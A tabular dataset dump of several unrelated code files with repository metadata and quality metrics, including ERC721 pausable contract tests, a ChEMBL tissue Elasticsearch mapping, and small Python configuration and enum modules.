hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fa41ceb73f01b6ed99614aa176053160f3a545b8 | 95 | py | Python | flask_api/celery_tasks/sms/constants.py | FanLgchen/Celery- | 409a609f476a84c421f718b9f1266c822bef1366 | [
"MIT"
] | 2 | 2020-06-18T09:39:13.000Z | 2020-10-05T03:11:33.000Z | flask_api/celery_tasks/sms/constants.py | FanLgchen/Celery- | 409a609f476a84c421f718b9f1266c822bef1366 | [
"MIT"
] | null | null | null | flask_api/celery_tasks/sms/constants.py | FanLgchen/Celery- | 409a609f476a84c421f718b9f1266c822bef1366 | [
"MIT"
] | null | null | null | # SMS signature
SMS_SIGN = 'demo'
# SMS verification code template ID
SMS_VERIFICATION_CODE_TEMPLATE_ID = 'SMS_151231777'
| 15.833333 | 52 | 0.747368 | 12 | 95 | 5.416667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113924 | 0.168421 | 95 | 5 | 53 | 19 | 0.708861 | 0.147368 | 0 | 0 | 0 | 0 | 0.232877 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fa47561e4fca5e7d0a34320e88d5fab9b997b427 | 4,929 | py | Python | tests/test_ERC721_Pausable.py | georgercarder/cairo-contracts | b661e1b65686820fa020c47c3c29a4951bb04547 | [
"MIT"
] | null | null | null | tests/test_ERC721_Pausable.py | georgercarder/cairo-contracts | b661e1b65686820fa020c47c3c29a4951bb04547 | [
"MIT"
] | null | null | null | tests/test_ERC721_Pausable.py | georgercarder/cairo-contracts | b661e1b65686820fa020c47c3c29a4951bb04547 | [
"MIT"
] | null | null | null | import pytest
import asyncio
from starkware.starknet.testing.starknet import Starknet
from utils import Signer, str_to_felt, assert_revert
signer = Signer(123456789987654321)
# bools (for readability)
false = 0
true = 1
# random uint256 tokenIDs
first_token_id = (5042, 0)
second_token_id = (7921, 1)
third_token_id = (0, 13)
# random data (mimicking bytes in Solidity)
data = [str_to_felt('0x42'), str_to_felt('0x89'), str_to_felt('0x55')]
@pytest.fixture(scope='module')
def event_loop():
return asyncio.new_event_loop()
@pytest.fixture(scope='function')
async def erc721_factory():
starknet = await Starknet.empty()
owner = await starknet.deploy(
"contracts/Account.cairo",
constructor_calldata=[signer.public_key]
)
other = await starknet.deploy(
"contracts/Account.cairo",
constructor_calldata=[signer.public_key]
)
erc721 = await starknet.deploy(
"contracts/token/ERC721_Pausable.cairo",
constructor_calldata=[
str_to_felt("Non Fungible Token"), # name
str_to_felt("NFT"), # ticker
owner.contract_address # owner
]
)
erc721_holder = await starknet.deploy("contracts/token/utils/ERC721_Holder.cairo")
# mint tokens to owner
tokens = [first_token_id, second_token_id]
for token in tokens:
await signer.send_transaction(
owner, erc721.contract_address, 'mint', [
owner.contract_address, *token]
)
return starknet, erc721, owner, other, erc721_holder
@pytest.mark.asyncio
async def test_pause(erc721_factory):
_, erc721, owner, other, erc721_holder = erc721_factory
# pause
await signer.send_transaction(owner, erc721.contract_address, 'pause', [])
execution_info = await erc721.paused().call()
assert execution_info.result.paused == 1
await assert_revert(signer.send_transaction(
owner, erc721.contract_address, 'approve', [
other.contract_address,
*first_token_id
])
)
await assert_revert(signer.send_transaction(
owner, erc721.contract_address, 'setApprovalForAll', [
other.contract_address,
true
])
)
await assert_revert(signer.send_transaction(
owner, erc721.contract_address, 'transferFrom', [
owner.contract_address,
other.contract_address,
*first_token_id
])
)
await assert_revert(signer.send_transaction(
owner, erc721.contract_address, 'safeTransferFrom', [
owner.contract_address,
erc721_holder.contract_address,
*first_token_id,
len(data),
*data
])
)
await assert_revert(signer.send_transaction(
owner, erc721.contract_address, 'mint', [
other.contract_address,
*third_token_id
])
)
@pytest.mark.asyncio
async def test_unpause(erc721_factory):
_, erc721, owner, other, erc721_holder = erc721_factory
# pause
await signer.send_transaction(owner, erc721.contract_address, 'pause', [])
# unpause
await signer.send_transaction(owner, erc721.contract_address, 'unpause', [])
execution_info = await erc721.paused().call()
assert execution_info.result.paused == 0
await signer.send_transaction(
owner, erc721.contract_address, 'approve', [
other.contract_address,
*first_token_id
]
)
await signer.send_transaction(
owner, erc721.contract_address, 'setApprovalForAll', [
other.contract_address,
true
]
)
await signer.send_transaction(
owner, erc721.contract_address, 'transferFrom', [
owner.contract_address,
other.contract_address,
*first_token_id
]
)
await signer.send_transaction(
other, erc721.contract_address, 'safeTransferFrom', [
owner.contract_address,
erc721_holder.contract_address,
*second_token_id,
len(data),
*data
]
)
await signer.send_transaction(
owner, erc721.contract_address, 'mint', [
other.contract_address,
*third_token_id
]
)
@pytest.mark.asyncio
async def test_only_owner(erc721_factory):
_, erc721, owner, other, _ = erc721_factory
# not-owner pause should revert
await assert_revert(signer.send_transaction(
other, erc721.contract_address, 'pause', []))
# owner pause
await signer.send_transaction(owner, erc721.contract_address, 'pause', [])
# not-owner unpause should revert
await assert_revert(signer.send_transaction(
other, erc721.contract_address, 'unpause', []))
# owner unpause
await signer.send_transaction(owner, erc721.contract_address, 'unpause', [])
| 27.082418 | 86 | 0.64435 | 519 | 4,929 | 5.863198 | 0.183044 | 0.167598 | 0.12422 | 0.128163 | 0.734473 | 0.701939 | 0.669077 | 0.667433 | 0.66579 | 0.645744 | 0 | 0.045791 | 0.260093 | 4,929 | 181 | 87 | 27.232044 | 0.788593 | 0.04788 | 0 | 0.526718 | 0 | 0 | 0.070115 | 0.026507 | 0 | 0 | 0.002565 | 0 | 0.076336 | 1 | 0.007634 | false | 0 | 0.030534 | 0.007634 | 0.053435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fa4b58e784df0a2ddab274bac344bf702ab449fb | 540 | py | Python | setup.py | ianhalpern/python-payment-processor | 64fb785373082da19a572097b738da4dd71bd985 | [
"MIT"
] | 12 | 2016-11-11T10:31:25.000Z | 2022-03-25T12:51:22.000Z | setup.py | ianhalpern/python-payment-processor | 64fb785373082da19a572097b738da4dd71bd985 | [
"MIT"
] | null | null | null | setup.py | ianhalpern/python-payment-processor | 64fb785373082da19a572097b738da4dd71bd985 | [
"MIT"
] | 3 | 2017-09-06T15:06:29.000Z | 2019-03-22T14:20:31.000Z | #!/usr/bin/python
from distutils.core import setup
setup(
name = 'payment_processor',
version = '0.2.0',
description = 'A simple payment gateway api wrapper',
author = 'Ian Halpern',
author_email = 'ian@ian-halpern.com',
url = 'https://launchpad.net/python-payment',
download_url = 'https://launchpad.net/python-payment/+download',
packages = (
'payment_processor',
'payment_processor.gateways',
'payment_processor.methods',
'payment_processor.exceptions',
'payment_processor.utils'
)
)
| 27 | 65 | 0.681481 | 61 | 540 | 5.901639 | 0.57377 | 0.266667 | 0.094444 | 0.111111 | 0.227778 | 0.227778 | 0.227778 | 0 | 0 | 0 | 0 | 0.006757 | 0.177778 | 540 | 19 | 66 | 28.421053 | 0.804054 | 0.02963 | 0 | 0 | 0 | 0 | 0.552581 | 0.195029 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.058824 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3af9c8ef389a9995607211ee0514625e68a7c702 | 189 | py | Python | {{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/apps/profiles/choices.py | powerdefy/cookiecutter-django-rest | 8841d7c959e588f34f260405af167206eaf47376 | [
"MIT"
] | null | null | null | {{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/apps/profiles/choices.py | powerdefy/cookiecutter-django-rest | 8841d7c959e588f34f260405af167206eaf47376 | [
"MIT"
] | null | null | null | {{cookiecutter.github_repository_name}}/{{cookiecutter.app_name}}/apps/profiles/choices.py | powerdefy/cookiecutter-django-rest | 8841d7c959e588f34f260405af167206eaf47376 | [
"MIT"
] | null | null | null | from django.db import models
class Role(models.IntegerChoices):
ADMIN = 0, 'Admin'
GENERAL = 1, 'General'
GUEST = 2, 'Guest'
ACCOUNTING = 3, 'Accounting'
IT = 4, 'IT'
| 18.9 | 34 | 0.613757 | 24 | 189 | 4.833333 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035461 | 0.253968 | 189 | 9 | 35 | 21 | 0.787234 | 0 | 0 | 0 | 0 | 0 | 0.153439 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
3afe29425779a97835f8aa292d16b97d3ebe99af | 13,194 | py | Python | src/glados/es/ws2es/mappings_skeletons/es_chembl_tissue_mapping.py | chembl/GLaDOS | 044ed5f927b45dd5033c9383085ad5922c61f331 | [
"Apache-2.0"
] | 33 | 2017-09-21T11:38:44.000Z | 2022-03-19T06:41:47.000Z | src/glados/es/ws2es/mappings_skeletons/es_chembl_tissue_mapping.py | chembl/GLaDOS | 044ed5f927b45dd5033c9383085ad5922c61f331 | [
"Apache-2.0"
] | 739 | 2016-08-22T09:32:17.000Z | 2022-03-22T09:29:32.000Z | src/glados/es/ws2es/mappings_skeletons/es_chembl_tissue_mapping.py | chembl/GLaDOS | 044ed5f927b45dd5033c9383085ad5922c61f331 | [
"Apache-2.0"
] | 5 | 2020-06-12T01:51:41.000Z | 2021-09-17T10:32:53.000Z | # Elastic search mapping definition for the Molecule entity
from glados.es.ws2es.es_util import DefaultMappings
# Shards size - can be overridden from the default calculated value here
# shards = 3,
replicas = 1
analysis = DefaultMappings.COMMON_ANALYSIS
mappings = \
{
'properties':
{
'_metadata':
{
'properties':
{
'es_completion': 'TEXT',
# EXAMPLES:
# '{'weight': 100, 'input': 'Retina/plasma'}' , '{'weight': 10, 'input': 'CHEMBL3987832'}' , '{'weig
# ht': 10, 'input': 'UBERON:0001066'}' , '{'weight': 100, 'input': 'Intraorbital lacrimal gland'}' ,
# '{'weight': 10, 'input': 'CHEMBL3833873'}' , '{'weight': 10, 'input': 'CHEMBL3987959'}' , '{'weig
# ht': 10, 'input': 'CHEMBL3988202'}' , '{'weight': 10, 'input': 'BTO:0001442'}' , '{'weight': 10, '
# input': 'UBERON:0000200'}' , '{'weight': 100, 'input': 'Aortic valve'}'
'organism_taxonomy':
{
'properties':
{
'l1': 'TEXT',
# EXAMPLES:
# 'Eukaryotes' , 'Eukaryotes' , 'Eukaryotes' , 'Eukaryotes' , 'Eukaryotes' , 'Eukaryotes' ,
# 'Eukaryotes' , 'Eukaryotes' , 'Bacteria' , 'Bacteria'
'l2': 'TEXT',
# EXAMPLES:
# 'Mammalia' , 'Mammalia' , 'Mammalia' , 'Mammalia' , 'Mammalia' , 'Mammalia' , 'Mammalia' ,
# 'Mammalia' , 'Gram-Positive' , 'Gram-Positive'
'l3': 'TEXT',
# EXAMPLES:
# 'Rodentia' , 'Primates' , 'Rodentia' , 'Rodentia' , 'Primates' , 'Lagomorpha' , 'Rodentia'
# , 'Rodentia' , 'Streptococcus' , 'Staphylococcus'
'oc_id': 'NUMERIC',
# EXAMPLES:
# '42' , '7' , '42' , '42' , '60' , '69' , '42' , '42' , '590' , '561'
'tax_id': 'NUMERIC',
# EXAMPLES:
# '10116' , '9606' , '10116' , '10116' , '9544' , '9986' , '10116' , '10116' , '1313' , '128
# 0'
}
},
'related_activities':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# '' , '' , '' , '' , '' , '' , '' , '' , '' , ''
'count': 'NUMERIC',
# EXAMPLES:
# '5' , '1' , '4' , '1' , '63' , '15' , '1' , '2' , '110' , '31'
}
},
'related_assays':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# 'CHEMBL3271354 CHEMBL3271351 CHEMBL3271352 CHEMBL3271353 CHEMBL3749611' , 'CHEMBL3266981'
# , 'CHEMBL3231741 CHEMBL3232032 CHEMBL3232142 CHEMBL3232050' , 'CHEMBL2212114' , 'CHEMBL102
# 2344 CHEMBL1275020 CHEMBL1274863 CHEMBL1274891 CHEMBL1274030 CHEMBL1022341 CHEMBL1011798 C
# HEMBL1019674 CHEMBL1274912 CHEMBL1274662 CHEMBL1017034 CHEMBL1274842 CHEMBL1274933 CHEMBL1
# 275069 CHEMBL1274558 CHEMBL1274898 CHEMBL1017033 CHEMBL1274849 CHEMBL1274565 CHEMBL1274593
# CHEMBL1274683 CHEMBL4000834 CHEMBL1011797 CHEMBL1274856 CHEMBL1274572 CHEMBL964747 CHEMBL
# 1275027 CHEMBL1274037 CHEMBL1274551 CHEMBL964745 CHEMBL1274926 CHEMBL1274919 CHEMBL1274690
# CHEMBL1275034 CHEMBL1274877 CHEMBL1274669 CHEMBL1275048 CHEMBL1274884 CHEMBL1017010 CHEMB
# L1017032 CHEMBL1022342 CHEMBL1022346 CHEMBL1017035 CHEMBL1275076 CHEMBL1275090 CHEMBL10170
# 09 CHEMBL1275062 CHEMBL1274579 CHEMBL1274905 CHEMBL1274676 CHEMBL1019675 CHEMBL1274586 CHE
# MBL964744 CHEMBL1274655 CHEMBL1022345 CHEMBL1275055 CHEMBL1011799 CHEMBL1275041 CHEMBL1275
# 083 CHEMBL1022343 CHEMBL964746 CHEMBL1274870 CHEMBL1274544' , 'CHEMBL3862853 CHEMBL3862825
# CHEMBL3862826' , 'CHEMBL3373694' , 'CHEMBL4054773 CHEMBL4054770' , 'CHEMBL1827722 CHEMBL3
# 583725 CHEMBL3389745 CHEMBL935349 CHEMBL3091242 CHEMBL3583724 CHEMBL3091255 CHEMBL3583723
# CHEMBL940282 CHEMBL3738486 CHEMBL1926063 CHEMBL1055389 CHEMBL1924493 CHEMBL3736923 CHEMBL3
# 736913 CHEMBL3583729 CHEMBL1924492 CHEMBL3738482 CHEMBL3737062 CHEMBL1924491 CHEMBL3389206
# CHEMBL1260643 CHEMBL935348 CHEMBL3389742 CHEMBL3389743 CHEMBL936043 CHEMBL3583728 CHEMBL1
# 805837 CHEMBL3606187 CHEMBL3389744 CHEMBL3736767 CHEMBL948103 CHEMBL1924490 CHEMBL940281 C
# HEMBL935351 CHEMBL3362796 CHEMBL935350 CHEMBL3606186 CHEMBL3389205 CHEMBL3583726 CHEMBL373
# 6765 CHEMBL1273661 CHEMBL1055388 CHEMBL1273660 CHEMBL1067241 CHEMBL1924489 CHEMBL935352 CH
# EMBL2214928 CHEMBL1067242' , 'CHEMBL994370 CHEMBL1218348 CHEMBL994358 CHEMBL994366 CHEMBL9
# 94362 CHEMBL994369 CHEMBL1218345 CHEMBL994359 CHEMBL1657220 CHEMBL1657221 CHEMBL1653373 CH
# EMBL1655162 CHEMBL994372 CHEMBL1218462 CHEMBL1654323 CHEMBL994371 CHEMBL1654028 CHEMBL1654
# 324 CHEMBL994368 CHEMBL1218349 CHEMBL1218341 CHEMBL994367 CHEMBL994363 CHEMBL1654322 CHEMB
# L994365 CHEMBL1654030 CHEMBL1654029'
'count': 'NUMERIC',
# EXAMPLES:
# '5' , '1' , '4' , '1' , '63' , '3' , '1' , '2' , '49' , '27'
}
},
'related_cell_lines':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# 'CHEMBL3833683' , 'CHEMBL3307768' , 'CHEMBL3307627' , 'CHEMBL3307355' , 'CHEMBL3307965' ,
# 'CHEMBL3307651' , 'CHEMBL3307762' , 'CHEMBL3307627' , 'CHEMBL3308019 CHEMBL3307570 CHEMBL3
# 307965 CHEMBL3307564' , 'CHEMBL3307383'
'count': 'NUMERIC',
# EXAMPLES:
# '1' , '1' , '1' , '1' , '1' , '1' , '1' , '1' , '4' , '1'
}
},
'related_compounds':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# 'CHEMBL2420629 CHEMBL3746776 CHEMBL3260358' , 'CHEMBL3260771' , 'CHEMBL3229240 CHEMBL32292
# 38' , 'CHEMBL2203701' , 'CHEMBL395998 CHEMBL2017983 CHEMBL1270517' , 'CHEMBL2403888 CHEMBL
# 3922006 CHEMBL3895075 CHEMBL3948952 CHEMBL3905199 CHEMBL3933212 CHEMBL3906900 CHEMBL210573
# 5 CHEMBL3921126' , 'CHEMBL3358920' , 'CHEMBL4074669' , 'CHEMBL3604813 CHEMBL188635 CHEMBL1
# 922318 CHEMBL1922327 CHEMBL2441068 CHEMBL1922489 CHEMBL510944 CHEMBL1922481 CHEMBL2206420
# CHEMBL3086523 CHEMBL1922499 CHEMBL1922323 CHEMBL1922328 CHEMBL1923420 CHEMBL1922486 CHEMBL
# 1922494 CHEMBL3580908 CHEMBL3580926 CHEMBL1922490 CHEMBL1922336 CHEMBL3735824 CHEMBL497 CH
# EMBL1922480 CHEMBL1922337 CHEMBL1922326 CHEMBL1922482 CHEMBL1258462 CHEMBL581906 CHEMBL192
# 2333 CHEMBL1922315 CHEMBL1922496 CHEMBL1922477 CHEMBL1272278 CHEMBL1922321 CHEMBL1922316 C
# HEMBL1822871 CHEMBL1922484 CHEMBL1922487 CHEMBL1272227 CHEMBL1922332 CHEMBL1922330 CHEMBL4
# 5 CHEMBL286615 CHEMBL1922479 CHEMBL411440 CHEMBL1922478 CHEMBL1922322 CHEMBL161 CHEMBL3876
# 75 CHEMBL1922500 CHEMBL1922335 CHEMBL1922324 CHEMBL1922497 CHEMBL551359 CHEMBL3580919 CHEM
# BL1922491 CHEMBL1922317 CHEMBL1922325 CHEMBL1922493 CHEMBL1922331 CHEMBL1922319 CHEMBL1922
# 483 CHEMBL75267 CHEMBL465372 CHEMBL1922488 CHEMBL1922498 CHEMBL1922329 CHEMBL1922334 CHEMB
# L1800922 CHEMBL3580916 CHEMBL502 CHEMBL1922492 CHEMBL1922320 CHEMBL1922495 CHEMBL1922485 C
# HEMBL2206412' , 'CHEMBL262777 CHEMBL520642 CHEMBL501122 CHEMBL32 CHEMBL126 CHEMBL387675'
'count': 'NUMERIC',
# EXAMPLES:
# '3' , '1' , '2' , '1' , '3' , '9' , '1' , '1' , '76' , '6'
}
},
'related_documents':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# 'CHEMBL3745705 CHEMBL3259558' , 'CHEMBL3259671' , 'CHEMBL3227952' , 'CHEMBL2203285' , 'CHE
# MBL1151757 CHEMBL1268908 CHEMBL4000173' , 'CHEMBL3861981' , 'CHEMBL3352115' , 'CHEMBL40526
# 43' , 'CHEMBL3603820 CHEMBL1921774 CHEMBL3734674 CHEMBL1143818 CHEMBL3085641 CHEMBL1156916
# CHEMBL3351484 CHEMBL1151477 CHEMBL1255186 CHEMBL3352025 CHEMBL1149049 CHEMBL1821588 CHEMB
# L3580567 CHEMBL1142351 CHEMBL2203249 CHEMBL1921784 CHEMBL1800034 CHEMBL1269010' , 'CHEMBL1
# 155768 CHEMBL1649142 CHEMBL1649273 CHEMBL1212779'
'count': 'NUMERIC',
# EXAMPLES:
# '2' , '1' , '1' , '1' , '3' , '1' , '1' , '1' , '18' , '4'
}
},
'related_targets':
{
'properties':
{
'all_chembl_ids': 'TEXT',
# EXAMPLES:
# 'CHEMBL612558 CHEMBL345' , 'CHEMBL1836' , 'CHEMBL612558' , 'CHEMBL612558' , 'CHEMBL612545
# CHEMBL612558' , 'CHEMBL612546' , 'CHEMBL376' , 'CHEMBL612545' , 'CHEMBL2574 CHEMBL375 CHEM
# BL612545 CHEMBL612546 CHEMBL612670 CHEMBL376 CHEMBL612558 CHEMBL613631 CHEMBL347' , 'CHEMB
# L352 CHEMBL374 CHEMBL362'
'count': 'NUMERIC',
# EXAMPLES:
# '2' , '1' , '1' , '1' , '2' , '1' , '1' , '1' , '9' , '3'
}
}
}
},
'bto_id': 'TEXT',
# EXAMPLES:
# 'BTO:0001442' , 'BTO:0001279' , 'BTO:0000156' , 'BTO:0001388' , 'BTO:0000928' , 'BTO:0000573' , 'BTO:00010
# 67' , 'BTO:0000493' , 'BTO:0004345' , 'BTO:0001063'
'caloha_id': 'TEXT',
# EXAMPLES:
# 'TS-0953' , 'TS-0099' , 'TS-1060' , 'TS-1307' , 'TS-0054' , 'TS-0394' , 'TS-0309' , 'TS-0813' , 'TS-1047'
# , 'TS-0469'
'efo_id': 'TEXT',
# EXAMPLES:
# 'EFO:0001914' , 'UBERON:0002240' , 'UBERON:0001348' , 'UBERON:0003126' , 'UBERON:0001637' , 'UBERON:000211
# 0' , 'UBERON:0002728' , 'UBERON:0000970' , 'UBERON:0001851' , 'UBERON:0000988'
'pref_name': 'TEXT',
# EXAMPLES:
# 'Retina/plasma' , 'Meningeal artery' , 'Intervertebral disk' , 'Intraorbital lacrimal gland' , 'Occipital
# lobe' , 'Sinoatrial node' , 'Ankle/Knee' , 'Brain ventricle' , 'Gyrus' , 'Aortic valve'
'tissue_chembl_id': 'TEXT',
# EXAMPLES:
# 'CHEMBL4296362' , 'CHEMBL3987832' , 'CHEMBL3987785' , 'CHEMBL3987787' , 'CHEMBL3833873' , 'CHEMBL3987959'
# , 'CHEMBL3988202' , 'CHEMBL4296347' , 'CHEMBL3987758' , 'CHEMBL3987638'
'uberon_id': 'TEXT',
# EXAMPLES:
# 'UBERON:0003474' , 'UBERON:0001066' , 'UBERON:0019324' , 'UBERON:0002021' , 'UBERON:0002351' , 'UBERON:000
# 4086' , 'UBERON:0000200' , 'UBERON:0002137' , 'UBERON:0001881' , 'UBERON:0002240'
}
}
| 66.301508 | 120 | 0.488176 | 796 | 13,194 | 8.050251 | 0.645729 | 0.029963 | 0.004682 | 0.020599 | 0.071161 | 0.071161 | 0.039326 | 0.008115 | 0 | 0 | 0 | 0.352382 | 0.417766 | 13,194 | 198 | 121 | 66.636364 | 0.481776 | 0.573821 | 0 | 0.259259 | 0 | 0 | 0.09695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.012346 | 0 | 0.012346 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d71c193d332979ad562f8d1039609bbf9888baf0 | 1,366 | py | Python | tmi/api/io.py | fish2000/TMI | e849545644b99c132ecde24427531edd45213614 | [
"BSD-3-Clause"
] | null | null | null | tmi/api/io.py | fish2000/TMI | e849545644b99c132ecde24427531edd45213614 | [
"BSD-3-Clause"
] | null | null | null | tmi/api/io.py | fish2000/TMI | e849545644b99c132ecde24427531edd45213614 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import print_function
from enum import unique
import sys
from clu.enums import AliasingEnum, alias
from clu.exporting import Exporter
exporter = Exporter(path=__file__)
export = exporter.decorator()
@unique
class Status(AliasingEnum):
DISCARD = 200
REPLACE_TEXT = 201
REPLACE_DOCUMENT = 202
INSERT_TEXT = 203
INSERT_SNIPPET = 204
SHOW_HTML = 205
SHOW_TOOLTIP = 206
NEW_DOCUMENT = 207
INSERT_SNIPPET_NOINDENT = 208
NOP = alias(DISCARD)
CREATE_NEW_DOCUMENT = alias(NEW_DOCUMENT)
@property
def code(self):
return int(self.value)
def exit(self, output):
sys.stdout.write(output)
sys.stdout.flush()
sys.exit(self.code)
# Assign the modules’ `__all__` and `__dir__` using the exporter:
__all__, __dir__ = exporter.all_and_dir()
def test():
# from clu.testing.utils import inline
# @inline
def test_one():
pass # INSERT TESTING CODE HERE, pt. I
#@inline
def test_two():
pass # INSERT TESTING CODE HERE, pt. II
#@inline.diagnostic
def show_me_some_values():
pass # INSERT DIAGNOSTIC CODE HERE
# return inline.test(100)
if __name__ == '__main__':
sys.exit(test())
